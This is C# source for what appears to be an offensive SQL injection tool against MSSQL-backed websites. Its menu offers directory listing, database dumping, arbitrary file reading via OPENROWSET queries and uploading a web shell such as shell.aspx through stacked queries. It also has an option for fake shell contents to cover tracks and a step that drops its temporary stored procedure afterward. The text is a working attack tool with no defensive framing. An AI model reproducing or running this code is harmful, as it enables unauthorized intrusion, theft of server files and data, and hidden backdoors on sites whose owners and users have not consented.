static void Main(string[] args) { QueriesDB.initialize(); UserInteraction.showBanner(); string basicURL = null; while (basicURL != "x") { basicURL = null; Log.logNotification("Press 'x' for exit.."); UserInteraction.promptForUserInput("Enter url"); basicURL = Console.ReadLine(); Exploitation.initialize(basicURL); if (basicURL != "x" && !String.IsNullOrEmpty(basicURL)) { int Choice = -1; while (Choice != 0) { Choice = UserInteraction.showMenuForIntChoice("Press '0' for Exit..\nPress '1' for directory navigation..\nPress '2' for dumping data.." + "\nPress '3' for files reading..\nPress '4' for shell uploading.."); if (Choice == 1) { DirListing.initialize(basicURL); } else if (Choice == 2) { DumpData.initialize(basicURL); } else if (Choice == 3) { ReadFile.Read(basicURL); } else if (Choice == 4) { ShellSpawning.Spawn(basicURL); } } } } Log.logOutput("Program is going to exit.. Press any key.."); Console.ReadKey(); }
public static void Read(string url) { string URLForReadingFile = QueryCrafter.constructQueryForSelectObject(url, QueriesDB.ReadFileOpenRowSetQuery); string UserChoice = "z"; while (UserChoice != "x") { UserChoice = UserInteraction.takeInputString("Press x to exit..\nEnter full/root path for file to read.. eg. E:\\inetpub\\site\\somefile.ext .."); if (UserChoice != "x") { string FinalFileReadURL = URLForReadingFile.Replace("[FILENAME]", UserChoice); var response = HTTPMethods.getResponse(FinalFileReadURL); if (response != null) { response = ResponseFilter.getPureResponseWithLastIndex(response); if (response != null) { Log.logOutput("--- [File Contents Start] ---"); Log.logOutput(response); Log.logOutput("--- [File Cotents End] ---"); UserChoice = UserInteraction.takeInputString("Press s to save File Or Enter to Ignore.."); if (UserChoice == "s") { SaveFile(response); } UserChoice = "z"; } else { Log.logError("Either File is empty or you 've no right to read that File.."); } } } } }
public static void Spawn(string url) { Log.logNotification("Confirming Web Response.."); var urlForResponseConfirmation = QueryCrafter.constructURLForConfirmation(url, QueriesDB.Replacement); if (ResponseFilter.confirmResponce(urlForResponseConfirmation, QueriesDB.Replacement)) { Log.logNotification("Web Response is OK.."); if (createProcFcUk(url)) { string RootPath = "z"; while (RootPath != "x") { RootPath = UserInteraction.takeInputString("Press x for Exit..\nEnter root for folder path C:\\websites\\somedir\\ "); if (RootPath != "x") { string fileName = UserInteraction.takeInputString("Enter filename to upload eg. shell.aspx .."); string UrlForUploading = null; string x = UserInteraction.takeInputString("Press 'r' for using Real Shell Contents..\nPress 'f' for fake Shell Contens to remove tracks.."); if (x == "f") { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryFAKE); } else { UrlForUploading = QueryCrafter.constructStackedQuery(url, QueriesDB.FileUploadingQueryREAL); } UrlForUploading = UrlForUploading.Replace("[PATH]", RootPath); UrlForUploading = UrlForUploading.Replace("[FILENAME]", fileName); UrlForUploading = UrlForUploading.Replace("rummykhan", QueriesDB.Replacement); Log.logNotification("Uploading shell to " + RootPath + fileName); if (ResponseFilter.confirmResponce(UrlForUploading, QueriesDB.Replacement)) { Log.logNotification("Confirming File Upload.."); if (confirmFileUpload(url, RootPath + fileName)) { Log.logOutput("Shell uploaded successfully to : " + RootPath + fileName); } else { Log.logError("Fail to upload file.."); } } } } } dropObject(url, QueriesDB.DropFcUkProcQuery); } else { Log.logError("No response from the server.."); } }